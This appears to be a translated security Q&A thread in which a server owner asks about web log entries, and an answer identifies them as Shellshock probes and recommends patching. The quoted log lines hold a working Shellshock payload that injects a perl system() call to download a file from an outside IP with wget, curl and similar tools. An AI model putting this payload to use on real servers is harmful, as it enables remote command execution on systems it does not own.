Il mio server è vulnerabile a un exploit perl?

Naviga le tue risposte
3

Ho alcune voci preoccupanti nei log del mio server web e mi chiedo se questo significhi che il mio server è vulnerabile.

In primo luogo, il seguente sembra fallire, ricevendo una risposta 404: 

[15/Jan/2016:10:27:47 +0000] "GET /cgi-bin/php4 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"
[15/Jan/2016:10:27:48 +0000] "GET /cgi-bin/php5 HTTP/1.1" 404 345 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"

Ma ciò che mi preoccupa è il messaggio successivo, che sembra ricevere una risposta di 200: 

[15/Jan/2016:10:27:48 +0000] "GET / HTTP/1.1" 200 2091 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plainrnrnXSUCCESS!";system(" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png ");'"

Il mio server ha risposto bloccando l'indirizzo IP ma chiaramente era un po 'troppo tardi.

I log suggeriscono che tutto ciò che è stato gestito è stato quello di scaricare un file immagine (che apparentemente non esiste sul server). Ma sembra che fosse solo una sonda e potrebbe essere molto peggio la prossima volta. O sto assumendo troppo?

Posso aggiungere filtri aggiuntivi, ma cosa posso fare per proteggermi da un tipo di attacco simile? Come potrei sapere se ero già stato compromesso?

L'indirizzo IP si trova in Iran. Ho già bloccato la Cina, quindi potrebbe pensare di fare lo stesso con l'Iran. Estrema, sì, ma i registri mostrano che migliaia di tentativi dalla Cina vengono fatti cadere ogni giorno.

    
posta Ken Sharp 15.01.2016 - 14:03
fonte

1 risposta

8

Notare la stringa magica () { :; }; . Stanno cercando di sondare e vedere se il tuo server è vulnerabile allo exploit di ShellShock . Perl è usato qui per stampare e vedere se l'attacco ha avuto successo. Assicurati di applicare patch e aggiornare il tuo server. Dovresti essere al sicuro da questo tipo di attacchi.

    
risposta data 15.01.2016 - 14:43
fonte

Leggi altre domande sui tag

Cracking a password File PDF protetto che utilizza John the Ripper Hashing password più volte con diversi sali casuali